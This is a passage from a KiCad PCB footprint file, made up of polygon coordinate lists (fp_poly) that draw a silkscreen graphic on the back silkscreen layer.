(xy 22.628418 -19.596194) (xy 22.427387 -19.872785) (xy 22.356264 -19.985137) (xy 22.146087 -20.377148)
(xy 21.948814 -20.812123) (xy 21.771971 -21.266309) (xy 21.623087 -21.715956) (xy 21.509686 -22.13731)
(xy 21.439295 -22.506621) (xy 21.419442 -22.800138) (xy 21.430166 -22.907625) (xy 21.477261 -23.054284)
(xy 21.564427 -23.109529) (xy 21.62454 -23.114) (xy 21.779386 -23.081906) (xy 22.041691 -22.986204)
(xy 22.409499 -22.827764) (xy 22.880854 -22.607458) (xy 23.453799 -22.326154) (xy 23.886134 -22.107763)
(xy 24.483412 -21.814) (xy 24.986066 -21.591541) (xy 25.403004 -21.438138) (xy 25.743133 -21.351541)
(xy 26.015363 -21.329501) (xy 26.228601 -21.369769) (xy 26.391756 -21.470096) (xy 26.396032 -21.474068)
(xy 26.478231 -21.570908) (xy 26.522885 -21.691625) (xy 26.540443 -21.875909) (xy 26.542327 -22.029693)
(xy 26.530539 -22.309754) (xy 26.495105 -22.666108) (xy 26.434741 -23.106738) (xy 26.348161 -23.639625)
(xy 26.234079 -24.272752) (xy 26.09121 -25.0141) (xy 25.943328 -25.74925) (xy 25.83288 -26.286732)
(xy 25.747677 -26.711999) (xy 25.690537 -27.037842) (xy 25.664275 -27.277049) (xy 25.671708 -27.44241)
(xy 25.715653 -27.546715) (xy 25.798927 -27.602752) (xy 25.924346 -27.623312) (xy 26.094727 -27.621183)
(xy 26.312886 -27.609155) (xy 26.3525 -27.607162) (xy 26.790097 -27.562487) (xy 27.157707 -27.468866)
(xy 27.273781 -27.424922) (xy 27.868734 -27.120229) (xy 28.454936 -26.702742) (xy 29.018654 -26.18657)
(xy 29.546154 -25.585821) (xy 30.023703 -24.914603) (xy 30.437567 -24.187025) (xy 30.450213 -24.16175)
(xy 30.797258 -23.350457) (xy 31.019129 -22.559786) (xy 31.115657 -21.78792) (xy 31.08667 -21.033043)
(xy 30.931998 -20.293338) (xy 30.651469 -19.566991) (xy 30.244914 -18.852183) (xy 29.907062 -18.385333)
(xy 29.723254 -18.142653) (xy 29.568746 -17.92215) (xy 29.461587 -17.750624) (xy 29.421409 -17.664166)
(xy 29.41081 -17.530081) (xy 29.430389 -17.322895) (xy 29.481886 -17.035085) (xy 29.567037 -16.659125)
(xy 29.687582 -16.187491) (xy 29.84526 -15.61266) (xy 30.041807 -14.927108) (xy 30.098846 -14.732)
(xy 30.329 -13.941572) (xy 30.523869 -13.256894) (xy 30.686648 -12.662687) (xy 30.82053 -12.143671)
(xy 30.928711 -11.684567) (xy 31.014386 -11.270094) (xy 31.080749 -10.884973) (xy 31.130995 -10.513924)
(xy 31.16832 -10.141668) (xy 31.195917 -9.752925) (xy 31.214117 -9.398) (xy 31.225736 -8.855995)
(xy 31.218024 -8.239448) (xy 31.193017 -7.586532) (xy 31.152746 -6.935416) (xy 31.099246 -6.324273)
(xy 31.034549 -5.791274) (xy 31.015262 -5.664699) (xy 30.93235 -5.190184) (xy 30.824375 -4.635896)
(xy 30.695987 -4.021174) (xy 30.551832 -3.365356) (xy 30.396559 -2.687783) (xy 30.234816 -2.007794)
(xy 30.071251 -1.344728) (xy 29.910512 -0.717925) (xy 29.757246 -0.146723) (xy 29.616103 0.349538)
(xy 29.491731 0.751518) (xy 29.429845 0.931817) (xy 29.2486 1.394981) (xy 29.041282 1.847819)
(xy 28.798719 2.304759) (xy 28.697242 2.472884) (xy 30.4165 2.472884) (xy 30.451709 2.409402)
(xy 30.551384 2.255409) (xy 30.706597 2.024042) (xy 30.90842 1.728435) (xy 31.147925 1.381723)
(xy 31.416184 0.997041) (xy 31.52775 0.838024) (xy 32.639 -0.743172) (xy 32.640503 -4.292711)
(xy 32.641927 -5.226238) (xy 32.645623 -6.041617) (xy 32.651996 -6.747685) (xy 32.661448 -7.353279)
(xy 32.674384 -7.867238) (xy 32.691208 -8.298399) (xy 32.712322 -8.655599) (xy 32.738131 -8.947677)
(xy 32.769039 -9.183469) (xy 32.805448 -9.371814) (xy 32.847763 -9.52155) (xy 32.883537 -9.613648)
(xy 32.95717 -9.746365) (xy 33.077583 -9.9289) (xy 33.226668 -10.137629) (xy 33.386314 -10.348931)
(xy 33.538413 -10.539182) (xy 33.664855 -10.684761) (xy 33.74753 -10.762043) (xy 33.767694 -10.766972)
(xy 33.769004 -10.701834) (xy 33.765275 -10.523558) (xy 33.75698 -10.245886) (xy 33.744594 -9.882558)
(xy 33.728589 -9.447318) (xy 33.70944 -8.953907) (xy 33.68762 -8.416067) (xy 33.681953 -8.279857)
(xy 33.630979 -6.797632) (xy 33.60696 -5.430453) (xy 33.609756 -4.169292) (xy 33.613954 -3.90525)
(xy 33.625538 -3.325976) (xy 33.638422 -2.847522) (xy 33.655239 -2.443715) (xy 33.678621 -2.088382)
(xy 33.711202 -1.755349) (xy 33.755616 -1.418444) (xy 33.814494 -1.051493) (xy 33.89047 -0.628322)
(xy 33.986177 -0.12276) (xy 34.003636 -0.03175) (xy 34.072699 0.369228) (xy 34.134409 0.803072)
(xy 34.182015 1.217431) (xy 34.20871 1.55875) (xy 34.220638 1.925071) (xy 34.207771 2.196631)
(xy 34.159474 2.404881) (xy 34.065111 2.581266) (xy 33.914048 2.757237) (xy 33.750372 2.914108)
(xy 33.335188 3.226877) (xy 32.895805 3.428926) (xy 32.446849 3.517035) (xy 32.002948 3.487986)
(xy 31.65475 3.375286) (xy 31.484105 3.284367) (xy 31.270212 3.150971) (xy 31.037785 2.99311)
(xy 30.811542 2.828797) (xy 30.616198 2.676044) (xy 30.476469 2.552863) (xy 30.41707 2.477266)
(xy 30.4165 2.472884) (xy 28.697242 2.472884) (xy 28.511734 2.780228) (xy 28.171153 3.288654)
(xy 27.767801 3.844463) (xy 27.292504 4.462084) (xy 26.770424 5.113746) (xy 26.24173 5.754176)
(xy 25.678019 6.41916) (xy 25.089505 7.09774) (xy 24.486401 7.778955) (xy 23.878923 8.451849)
(xy 23.277284 9.105461) (xy 22.691699 9.728834) (xy 22.293751 10.143046) (xy 26.040574 10.143046)
(xy 26.121906 9.886365) (xy 26.166608 9.819314) (xy 26.283749 9.690007) (xy 26.372515 9.663693)
(xy 26.470118 9.734611) (xy 26.500889 9.767553) (xy 26.617082 9.946489) (xy 26.717575 10.1933)
(xy 26.797467 10.478763) (xy 26.851852 10.773656) (xy 26.875826 11.048758) (xy 26.864487 11.274847)
(xy 26.81293 11.422699) (xy 26.783434 11.451241) (xy 26.691926 11.480493) (xy 26.588591 11.431588)
(xy 26.492015 11.346741) (xy 26.275384 11.079094) (xy 26.123686 10.769321) (xy 26.043292 10.447335)
(xy 26.040574 10.143046) (xy 22.293751 10.143046) (xy 22.132382 10.311009) (xy 21.609547 10.841027)
(xy 21.133409 11.30793) (xy 20.714182 11.700759) (xy 20.362081 12.008555) (xy 20.285875 12.070825)
(xy 20.032891 12.262145) (xy 19.68495 12.507521) (xy 19.256937 12.797255) (xy 18.763733 13.121651)
(xy 18.220221 13.471011) (xy 17.641284 13.835638) (xy 17.041805 14.205836) (xy 16.570904 14.491389)
(xy 15.944615 14.864273) (xy 15.326944 15.223928) (xy 14.978936 15.421607) (xy 20.142519 15.421607)
(xy 20.164638 15.187753) (xy 20.244219 15.021001) (xy 20.386271 14.903818) (xy 20.595801 14.818672)
(xy 20.6375 14.806403) (xy 20.92882 14.743368) (xy 21.125567 14.74944) (xy 21.240618 14.82602)
(xy 21.265965 14.874875) (xy 21.303574 15.018506) (xy 21.349614 15.260438) (xy 21.400095 15.57258)
(xy 21.451027 15.926844) (xy 21.498419 16.295137) (xy 21.538282 16.64937) (xy 21.566626 16.961454)
(xy 21.570937 17.021933) (xy 21.583014 17.368613) (xy 21.561082 17.607718) (xy 21.499228 17.755529)
(xy 21.391536 17.828324) (xy 21.272475 17.8435) (xy 21.027516 17.782651) (xy 20.806542 17.599649)
(xy 20.60914 17.293812) (xy 20.434896 16.864461) (xy 20.283396 16.310914) (xy 20.250634 16.16075)
(xy 20.172854 15.740095) (xy 20.142519 15.421607) (xy 14.978936 15.421607) (xy 14.703667 15.577968)
(xy 14.06056 15.93401) (xy 13.383399 16.299672) (xy 12.65796 16.682568) (xy 11.870018 17.090315)
(xy 11.00535 17.530528) (xy 10.049732 18.010826) (xy 9.30275 18.38307) (xy 8.515764 18.774833)
(xy 7.835443 19.115336) (xy 7.254184 19.408739) (xy 6.764382 19.659204) (xy 6.358433 19.87089)
(xy 6.028732 20.047958) (xy 5.767677 20.194569) (xy 5.567662 20.314884) (xy 5.421083 20.413062)
(xy 5.320336 20.493266) (xy 5.257818 20.559654) (xy 5.227177 20.61301) (xy 5.249666 20.7205)
(xy 5.367886 20.885881) (xy 5.461715 20.98748) (xy 5.611675 21.147057) (xy 5.688833 21.263993)
(xy 5.7116 21.384021) (xy 5.698386 21.55287) (xy 5.696291 21.570147) (xy 5.64359 21.852523)
(xy 5.548534 22.214166) (xy 5.419312 22.633808) (xy 5.264112 23.090179) (xy 5.091123 23.56201)
(xy 4.908534 24.028031) (xy 4.724534 24.466974) (xy 4.547312 24.857569) (xy 4.385055 25.178547)
(xy 4.245954 25.408639) (xy 4.191482 25.478686) (xy 3.951236 25.74925) (xy 3.388493 25.74925)
(xy 3.101926 25.744805) (xy 2.898502 25.72535) (xy 2.734495 25.681705) (xy 2.56618 25.60469)
(xy 2.481088 25.55875) (xy 2.21851 25.381703) (xy 1.968172 25.142915) (xy 1.723061 24.831498)
(xy 1.476162 24.436565) (xy 1.220462 23.947228) (xy 0.948947 23.3526) (xy 0.742509 22.86)
(xy 0.507621 22.263811) (xy 0.327737 21.764712) (xy 0.204188 21.366836) (xy 0.138305 21.074314)
(xy 0.127 20.948312) (xy 0.183373 20.733519) (xy 0.335525 20.580189) (xy 0.558 20.511945)
(xy 0.598714 20.510501) (xy 0.798211 20.473014) (xy 0.949694 20.377141) (xy 1.015351 20.247762)
(xy 1.015762 20.23609) (xy 0.965458 20.077448) (xy 0.834999 19.890587) (xy 0.653801 19.711498)
(xy 0.496104 19.60032) (xy 0.258286 19.489844) (xy -0.078681 19.369814) (xy -0.487949 19.246603)
(xy -0.942669 19.126588) (xy -1.415994 19.016142) (xy -1.881075 18.92164) (xy -2.311065 18.849457)
(xy -2.679115 18.805967) (xy -2.891441 18.796) (xy -3.110177 18.803875) (xy -3.302099 18.834806)
(xy -3.489775 18.899759) (xy -3.695769 19.009695) (xy -3.942645 19.175579) (xy -4.252971 19.408373)
(xy -4.420829 19.539057) (xy -5.002483 19.973904) (xy -5.619204 20.397042) (xy -6.251586 20.797475)
(xy -6.880225 21.164211) (xy -7.485719 21.486255) (xy -8.048661 21.752613) (xy -8.549649 21.952291)
(xy -8.840515 22.043171) (xy -9.171337 22.074712) (xy -9.46909 21.984035) (xy -9.733097 21.771722)
(xy -9.962681 21.438354) (xy -10.157167 20.984515) (xy -10.190954 20.881998) (xy -10.298824 20.488688)
(xy -10.398426 20.026903) (xy -10.488113 19.515428) (xy -10.566234 18.973048) (xy -10.63114 18.418551)
(xy -10.681181 17.87072) (xy -10.714707 17.348342) (xy -10.730069 16.870203) (xy -10.725618 16.455087)
(xy -10.699704 16.121781) (xy -10.650676 15.88907) (xy -10.63319 15.845771) (xy -10.466297 15.631578)
(xy -10.224745 15.513347) (xy -10.058609 15.494) (xy -9.794849 15.433552) (xy -9.522871 15.259034)
(xy -9.343927 15.082285) (xy -9.200571 14.890733) (xy -9.155693 14.7289) (xy -9.208282 14.556815)
(xy -9.326077 14.376403) (xy -9.449935 14.226752) (xy -9.642126 14.018153) (xy -9.889597 13.762906)
(xy -10.179292 13.473312) (xy -10.498161 13.161671) (xy -10.833147 12.840284) (xy -11.1712 12.521451)
(xy -11.499264 12.217472) (xy -11.804286 11.940648) (xy -12.073213 11.70328) (xy -12.292991 11.517667)
(xy -12.450568 11.39611) (xy -12.532889 11.35091) (xy -12.536607 11.351089) (xy -12.617776 11.377702)
(xy -12.798632 11.442627) (xy -13.060218 11.538875) (xy -13.383574 11.659455) (xy -13.749744 11.797377)
(xy -13.84877 11.834892) (xy -14.651496 12.135249) (xy -15.354345 12.388139) (xy -15.97351 12.597643)
(xy -16.525181 12.767845) (xy -17.02555 12.902826) (xy -17.490808 13.006669) (xy -17.937146 13.083456)
(xy -18.380755 13.137271) (xy -18.837826 13.172195) (xy -19.219727 13.189134) (xy -20.310204 13.225065)
(xy -20.285567 12.978408) (xy -20.270077 12.796638) (xy -20.25129 12.537832) (xy -20.232774 12.25177)
(xy -20.229201 12.192) (xy -20.192159 11.804297) (xy -20.123111 11.414374) (xy -20.015822 11.0021)
(xy -19.864051 10.547345) (xy -19.661564 10.02998) (xy -19.40212 9.429873) (xy -19.310212 9.226221)
(xy -19.160608 8.876365) (xy -19.013044 8.495281) (xy -18.887556 8.136482) (xy -18.822811 7.924471)
(xy -18.719037 7.554535) (xy -18.627969 7.276193) (xy -18.530103 7.0751) (xy -18.405937 6.936911)
(xy -18.235967 6.847281) (xy -18.00069 6.791863) (xy -17.680601 6.756314) (xy -17.256199 6.726288)
(xy -17.187601 6.721725) (xy -16.832555 6.696935) (xy -16.506262 6.672164) (xy -16.237403 6.649733)
(xy -16.054656 6.631964) (xy -16.010716 6.626483) (xy -15.797182 6.59556) (xy -15.840288 6.044155)
(xy -15.913642 5.333091) (xy -16.01325 4.744543) (xy -16.139704 4.276644) (xy -16.293592 3.927531)
(xy -16.475506 3.695338) (xy -16.612564 3.604614) (xy -16.742779 3.56347) (xy -16.835603 3.606031)
(xy -16.89846 3.676444) (xy -16.987863 3.845961) (xy -17.018 3.998972) (xy -17.066244 4.216368)
(xy -17.215342 4.399244) (xy -17.471842 4.551772) (xy -17.842296 4.678125) (xy -18.214356 4.761155)
(xy -18.385576 4.787249) (xy -18.665084 4.822589) (xy -19.034652 4.86534) (xy -19.476051 4.91367)
(xy -19.971055 4.965744) (xy -20.501434 5.019731) (xy -21.04896 5.073796) (xy -21.595406 5.126107)
(xy -22.122543 5.174831) (xy -22.612144 5.218134) (xy -23.04598 5.254183) (xy -23.33625 5.276253)
(xy -23.895666 5.307527) (xy -24.391962 5.31762) (xy -24.810656 5.307022) (xy -25.137261 5.276227)
(xy -25.357292 5.225725) (xy -25.401706 5.206088) (xy -25.555255 5.086983) (xy -25.612359 4.932527)
(xy -25.57642 4.72123) (xy -25.50618 4.546281) (xy -25.250476 4.07991) (xy -24.896941 3.571598)
(xy -24.46116 3.036546) (xy -23.958721 2.489955) (xy -23.405209 1.947024) (xy -22.816212 1.422956)
(xy -22.207316 0.93295) (xy -21.594108 0.492208) (xy -20.992175 0.11593) (xy -20.92325 0.076844)
(xy -20.630493 -0.087479) (xy -20.330611 -0.256127) (xy -20.071705 -0.402038) (xy -19.981015 -0.453277)
(xy -19.729204 -0.610303) (xy -19.568144 -0.760469) (xy -19.485826 -0.933559) (xy -19.470242 -1.159359)
(xy -19.509383 -1.467654) (xy -19.528881 -1.574756) (xy -19.599501 -1.919813) (xy -19.66804 -2.164454)
(xy -19.748377 -2.334259) (xy -19.854388 -2.454805) (xy -19.999952 -2.551672) (xy -20.082078 -2.594361)
(xy -20.251554 -2.692876) (xy -20.360897 -2.784073) (xy -20.3835 -2.826602) (xy -20.3292 -2.93118)
(xy -20.168016 -3.098019) (xy -19.902522 -3.324976) (xy -19.535296 -3.609908) (xy -19.068912 -3.950674)
(xy -18.822229 -4.125275) (xy -17.911978 -4.772333) (xy -17.100297 -5.367642) (xy -16.374745 -5.921144)
(xy -15.722881 -6.442783) (xy -15.132266 -6.942501) (xy -14.59046 -7.430241) (xy -14.108491 -7.892673)
(xy -13.665125 -8.347144) (xy -13.28785 -8.765774) (xy -12.982232 -9.140826) (xy -12.75384 -9.464564)
(xy -12.608238 -9.729254) (xy -12.550995 -9.927159) (xy -12.570818 -10.029468) (xy -12.679821 -10.089797)
(xy -12.880379 -10.085094) (xy -13.157105 -10.018824) (xy -13.494607 -9.89445) (xy -13.806191 -9.751399)
(xy -14.231196 -9.523208) (xy -14.737614 -9.221593) (xy -15.310729 -8.856129) (xy -15.935828 -8.436388)
(xy -16.598194 -7.971946) (xy -17.09289 -7.613052) (xy -17.936091 -7.0076) (xy -18.704882 -6.489177)
(xy -19.411944 -6.052381) (xy -20.069961 -5.691808) (xy -20.691615 -5.402057) (xy -21.289591 -5.177724)
(xy -21.876571 -5.013407) (xy -22.465237 -4.903703) (xy -23.068274 -4.843209) (xy -23.63475 -4.826374)
(xy -24.199353 -4.848125) (xy -24.676686 -4.919941) (xy -25.073956 -5.050557) (xy -25.398371 -5.248703)
(xy -25.657139 -5.523114) (xy -25.857468 -5.882521) (xy -26.006564 -6.335658) (xy -26.111637 -6.891258)
(xy -26.179892 -7.558052) (xy -26.202545 -7.9375) (xy -26.214811 -8.345949) (xy -30.074751 -8.345949)
(xy -30.074772 -8.345687) (xy -30.096539 -8.161218) (xy -30.102438 -8.129742) (xy -30.16079 -7.925728)
(xy -30.249989 -7.750052) (xy -30.394577 -7.562108) (xy -30.543805 -7.399492) (xy -30.806052 -7.102381)
(xy -30.994202 -6.827136) (xy -31.109304 -6.554536) (xy -31.152405 -6.265358) (xy -31.124555 -5.940381)
(xy -31.026803 -5.560382) (xy -30.886215 -5.177078) (xy -28.482728 -5.177078) (xy -28.423037 -5.262893)
(xy -28.411025 -5.276273) (xy -28.287835 -5.372113) (xy -28.149383 -5.382887) (xy -27.969745 -5.305198)
(xy -27.806653 -5.197111) (xy -27.621909 -5.056399) (xy -27.388623 -4.86737) (xy -27.152302 -4.667047)
(xy -27.1145 -4.634006) (xy -26.655433 -4.265443) (xy -26.139867 -3.910464) (xy -25.601702 -3.589142)
(xy -25.07484 -3.32155) (xy -24.593181 -3.127759) (xy -24.54275 -3.11128) (xy -24.32756 -3.031674)
(xy -24.086598 -2.925604) (xy -23.852942 -2.8098) (xy -23.659667 -2.70099) (xy -23.539851 -2.615905)
(xy -23.521273 -2.594637) (xy -23.514599 -2.489928) (xy -23.614714 -2.39817) (xy -23.801455 -2.328719)
(xy -24.054662 -2.290934) (xy -24.18466 -2.286753) (xy -24.719894 -2.335421) (xy -25.261547 -2.482864)
(xy -25.821886 -2.734121) (xy -26.413176 -3.094227) (xy -26.762414 -3.345328) (xy -27.093033 -3.607542)
(xy -27.425804 -3.893911) (xy -27.741148 -4.18545) (xy -28.019488 -4.463171) (xy -28.241245 -4.708088)
(xy -28.386841 -4.901215) (xy -28.412282 -4.945325) (xy -28.479075 -5.089276) (xy -28.482728 -5.177078)
(xy -30.886215 -5.177078) (xy -30.860196 -5.106139) (xy -30.690762 -4.705347) (xy -30.494584 -4.203756)
(xy -30.384178 -3.787027) (xy -30.358186 -3.447626) (xy -30.415251 -3.178017) (xy -30.415362 -3.177748)
(xy -30.565662 -2.959283) (xy -30.82198 -2.745593) (xy -31.163388 -2.54512) (xy -31.568959 -2.366305)
(xy -32.017764 -2.217591) (xy -32.488874 -2.10742) (xy -32.961361 -2.044235) (xy -33.254786 -2.032354)
(xy -33.674026 -2.04812) (xy -33.996651 -2.105505) (xy -34.250464 -2.220657) (xy -34.463269 -2.409728)
(xy -34.66287 -2.688867) (xy -34.800974 -2.930458) (xy -35.150238 -3.635541) (xy -35.500879 -4.461477)
(xy -35.853592 -5.410068) (xy -36.209077 -6.483117) (xy -36.34511 -6.924141) (xy -36.719264 -8.225115)
(xy -37.041418 -9.491594) (xy -37.314444 -10.743509) (xy -37.541218 -12.000789) (xy -37.724613 -13.283363)
(xy -37.867505 -14.611161) (xy -37.972767 -16.004111) (xy -38.043274 -17.482144) (xy -38.08024 -18.95475)
(xy -38.08987 -19.696276) (xy -38.092646 -20.322962) (xy -39.946731 -20.322962) (xy -39.955448 -20.117888)
(xy -39.969786 -19.519205) (xy -39.975602 -18.88219) (xy -39.972913 -18.228936) (xy -39.961736 -17.581538)
(xy -39.94209 -16.962089) (xy -39.913993 -16.392685) (xy -39.877461 -15.895418) (xy -39.856456 -15.6845)
(xy -39.655934 -14.111053) (xy -39.40315 -12.522999) (xy -39.10311 -10.94254) (xy -38.760821 -9.39188)
(xy -38.381289 -7.893224) (xy -37.969522 -6.468774) (xy -37.530525 -5.140734) (xy -37.393766 -4.763093)
(xy -37.189508 -4.243372) (xy -36.952764 -3.694446) (xy -36.695717 -3.140764) (xy -36.430547 -2.606773)
(xy -36.169438 -2.116924) (xy -35.92457 -1.695665) (xy -35.708125 -1.367446) (xy -35.688627 -1.340836)
(xy -35.289569 -0.872513) (xy -34.869553 -0.519779) (xy -34.423828 -0.282352) (xy -33.947643 -0.159949)
(xy -33.436247 -0.152286) (xy -32.88489 -0.25908) (xy -32.288821 -0.480049) (xy -31.643288 -0.814908)
(xy -31.22364 -1.074686) (xy -30.860264 -1.301185) (xy -30.497037 -1.508387) (xy -30.162726 -1.681087)
(xy -29.886101 -1.804083) (xy -29.762181 -1.847014) (xy -29.636572 -1.862177) (xy -29.520693 -1.824065)
(xy -29.407552 -1.721596) (xy -29.356021 -1.643501) (xy -27.213849 -1.643501) (xy -27.21221 -1.822523)
(xy -27.211727 -1.82448) (xy -27.141483 -1.944296) (xy -27.020052 -1.947901) (xy -26.847422 -1.835295)
(xy -26.7589 -1.7526) (xy -26.61194 -1.593423) (xy -26.556426 -1.478091) (xy -26.587805 -1.367302)
(xy -26.697903 -1.225915) (xy -26.814626 -1.111979) (xy -26.904261 -1.089789) (xy -26.967778 -1.117445)
(xy -27.073126 -1.237323) (xy -27.161319 -1.430555) (xy -27.213849 -1.643501) (xy -29.356021 -1.643501)
(xy -29.290157 -1.543687) (xy -29.161517 -1.279259) (xy -29.014639 -0.917229) (xy -28.842534 -0.446516)
(xy -28.797172 -0.3175) (xy -28.627277 0.155467) (xy -28.481001 0.527673) (xy -28.347116 0.820484)
(xy -28.214394 1.055265) (xy -28.071607 1.253382) (xy -27.907528 1.4362) (xy -27.840461 1.502991)
(xy -27.628068 1.731915) (xy -27.505028 1.92513) (xy -27.457707 2.073633) (xy -27.447417 2.215169)
(xy -27.44707 2.457471) (xy -27.455988 2.774751) (xy -27.47349 3.14122) (xy -27.494464 3.470065)
(xy -27.531396 4.140827) (xy -27.536756 4.701913) (xy -27.50848 5.167168) (xy -27.444508 5.550439)
(xy -27.342777 5.865572) (xy -27.201228 6.126415) (xy -27.07513 6.286574) (xy -26.843777 6.488939)
(xy -26.558558 6.631466) (xy -26.193964 6.724344) (xy -25.87625 6.765424) (xy -25.532898 6.811353)
(xy -25.256884 6.888411) (xy -25.00012 7.016089) (xy -24.985206 7.026418) (xy -22.513998 7.026418)
(xy -22.513183 6.817209) (xy -22.417263 6.6484) (xy -22.255305 6.533747) (xy -22.056378 6.487005)
(xy -21.849551 6.521931) (xy -21.682364 6.632864) (xy -21.57917 6.79552) (xy -21.52502 7.006053)
(xy -21.515843 7.235536) (xy -21.547566 7.455042) (xy -21.616118 7.635642) (xy -21.717427 7.748409)
(xy -21.841863 7.765958) (xy -21.970666 7.691801) (xy -22.134523 7.545628) (xy -22.301067 7.363048)
(xy -22.437933 7.179674) (xy -22.512758 7.031116) (xy -22.513998 7.026418) (xy -24.985206 7.026418)
(xy -24.714519 7.213876) (xy -24.652536 7.261369) (xy -24.459199 7.4237) (xy -24.210484 7.651313)
(xy -23.922886 7.927211) (xy -23.612903 8.234396) (xy -23.297033 8.555873) (xy -22.991774 8.874643)
(xy -22.713622 9.173711) (xy -22.479075 9.436078) (xy -22.304631 9.644749) (xy -22.208895 9.779)
(xy -22.119883 9.945717) (xy -22.048892 10.113256) (xy -21.991794 10.302213) (xy -21.944462 10.533188)
(xy -21.90277 10.826777) (xy -21.86259 11.203581) (xy -21.819795 11.684195) (xy -21.814482 11.7475)
(xy -21.767911 12.273632) (xy -21.724046 12.690358) (xy -21.679595 13.01513) (xy -21.631267 13.265402)
(xy -21.57577 13.458626) (xy -21.509814 13.612254) (xy -21.441021 13.72779) (xy -21.316758 13.889676)
(xy -21.174588 14.021597) (xy -21.000903 14.126469) (xy -20.782091 14.20721) (xy -20.504543 14.266735)
(xy -20.15465 14.30796) (xy -19.718801 14.333802) (xy -19.183388 14.347176) (xy -18.534799 14.351)
(xy -18.532586 14.351) (xy -18.076384 14.353842) (xy -17.640672 14.361813) (xy -17.24864 14.374085)
(xy -16.923481 14.38983) (xy -16.688384 14.408218) (xy -16.601038 14.420022) (xy -16.082525 14.577436)
(xy -15.579083 14.857757) (xy -15.087632 15.26276) (xy -15.016403 15.332723) (xy -14.68262 15.716113)
(xy -14.378644 16.170932) (xy -14.099811 16.707655) (xy -13.841458 17.336756) (xy -13.598922 18.068711)
(xy -13.367541 18.913993) (xy -13.300621 19.186994) (xy -13.110065 19.959454) (xy -12.933072 20.623931)
(xy -12.763866 21.197965) (xy -12.596668 21.699091) (xy -12.425701 22.144847) (xy -12.245187 22.55277)
(xy -12.088157 22.867207) (xy -11.871916 23.237605) (xy -11.656194 23.500458) (xy -11.414366 23.672285)
(xy -11.119807 23.769607) (xy -10.745891 23.808944) (xy -10.565193 23.812146) (xy -9.807907 23.761958)
(xy -9.038748 23.608448) (xy -8.251588 23.348972) (xy -7.440296 22.980886) (xy -6.598743 22.501543)
(xy -5.720799 21.9083) (xy -5.1435 21.472731) (xy -4.762102 21.186965) (xy -4.413406 20.950608)
(xy -4.111041 20.77135) (xy -3.868634 20.656879) (xy -3.699814 20.614885) (xy -3.642549 20.625864)
(xy -3.544521 20.717713) (xy -3.388237 20.91352) (xy -3.178193 21.206835) (xy -2.91889 21.591203)
(xy -2.614824 22.060173) (xy -2.3495 22.480506) (xy -1.834603 23.297465) (xy -1.374238 24.010819)
(xy -0.961614 24.628178) (xy -0.589942 25.157153) (xy -0.252429 25.605352) (xy 0.057714 25.980385)
(xy 0.347279 26.289861) (xy 0.623055 26.541392) (xy 0.891834 26.742584) (xy 1.160406 26.90105)
(xy 1.435563 27.024397) (xy 1.724094 27.120236) (xy 1.812388 27.14427) (xy 2.333266 27.231978)
(xy 2.873912 27.23721) (xy 3.410133 27.16612)) (layer B.SilkS) (width 0.01))
(fp_poly (pts (xy 6.456307 -4.66739) (xy 6.876448 -4.720313) (xy 7.302739 -4.809144) (xy 7.699177 -4.927306)
(xy 8.029755 -5.068225) (xy 8.127831 -5.124602) (xy 8.223095 -5.198005) (xy 8.37637 -5.329858)
(xy 8.565445 -5.49948) (xy 8.768111 -5.686192) (xy 8.962157 -5.869315) (xy 9.125373 -6.028168)
(xy 9.235548 -6.142073) (xy 9.271 -6.188979) (xy 9.216021 -6.17479) (xy 9.067848 -6.123437)
(xy 8.851622 -6.04386) (xy 8.683625 -5.980135) (xy 8.373013 -5.867756) (xy 8.125586 -5.79922)
(xy 7.889736 -5.764043) (xy 7.613856 -5.751741) (xy 7.5565 -5.75115) (xy 7.25667 -5.756119)
(xy 7.042367 -5.780585) (xy 6.872748 -5.831389) (xy 6.76275 -5.884116) (xy 6.400814 -6.140877)
(xy 6.147945 -6.46237) (xy 6.004299 -6.847997) (xy 5.970032 -7.297163) (xy 6.045303 -7.809269)
(xy 6.157069 -8.187229) (xy 6.404096 -8.763394) (xy 6.71414 -9.268077) (xy 7.076021 -9.69112)
(xy 7.47856 -10.022362) (xy 7.910574 -10.251643) (xy 8.360886 -10.368803) (xy 8.5725 -10.38225)
(xy 8.953065 -10.342642) (xy 9.279588 -10.217601) (xy 9.562677 -9.997802) (xy 9.812942 -9.67392)
(xy 10.040991 -9.236629) (xy 10.136357 -9.007602) (xy 10.225099 -8.797076) (xy 10.301938 -8.642577)
(xy 10.351966 -8.573641) (xy 10.355961 -8.5725) (xy 10.390018 -8.630174) (xy 10.442276 -8.78548)
(xy 10.504458 -9.01184) (xy 10.545315 -9.180328) (xy 10.653231 -9.902259) (xy 10.6435 -10.633176)
(xy 10.515034 -11.380787) (xy 10.266746 -12.152798) (xy 10.058463 -12.633767) (xy 9.740474 -13.229938)
(xy 9.396826 -13.732366) (xy 9.034953 -14.132922) (xy 8.66229 -14.423478) (xy 8.286272 -14.595906)
(xy 8.255976 -14.604432) (xy 7.862962 -14.675815) (xy 7.434244 -14.699366) (xy 7.041181 -14.671591)
(xy 7.005468 -14.665658) (xy 6.346533 -14.486958) (xy 5.719503 -14.197214) (xy 5.142901 -13.810282)
(xy 4.635249 -13.340016) (xy 4.215071 -12.800271) (xy 3.995426 -12.41425) (xy 3.768923 -11.888954)
(xy 3.608182 -11.355752) (xy 3.54482 -11.00216) (xy 5.790772 -11.00216) (xy 5.792797 -11.194015)
(xy 5.870784 -11.395287) (xy 5.91427 -11.458477) (xy 6.126118 -11.646347) (xy 6.372258 -11.737258)
(xy 6.62082 -11.724211) (xy 6.78037 -11.648649) (xy 6.889798 -11.501603) (xy 6.922438 -11.296002)
(xy 6.872413 -11.078648) (xy 6.856117 -11.045482) (xy 6.705594 -10.886003) (xy 6.482491 -10.7851)
(xy 6.230768 -10.750883) (xy 5.994388 -10.791463) (xy 5.868083 -10.863202) (xy 5.790772 -11.00216)
(xy 3.54482 -11.00216) (xy 3.504645 -10.777964) (xy 3.449756 -10.11891) (xy 3.447344 -10.06475)
(xy 3.453719 -9.126797) (xy 3.558014 -8.25386) (xy 3.764307 -7.425379) (xy 4.076679 -6.620795)
(xy 4.169288 -6.426119) (xy 4.384517 -6.045669) (xy 4.644485 -5.675204) (xy 4.930096 -5.335262)
(xy 5.222252 -5.04638) (xy 5.501857 -4.829093) (xy 5.749814 -4.703939) (xy 5.7785 -4.695567)
(xy 6.078323 -4.65695) (xy 6.456307 -4.66739)) (layer B.SilkS) (width 0.01))
(fp_poly (pts (xy 18.186538 -0.460222) (xy 18.413224 -0.514507) (xy 18.669556 -0.596442) (xy 18.92717 -0.694147)
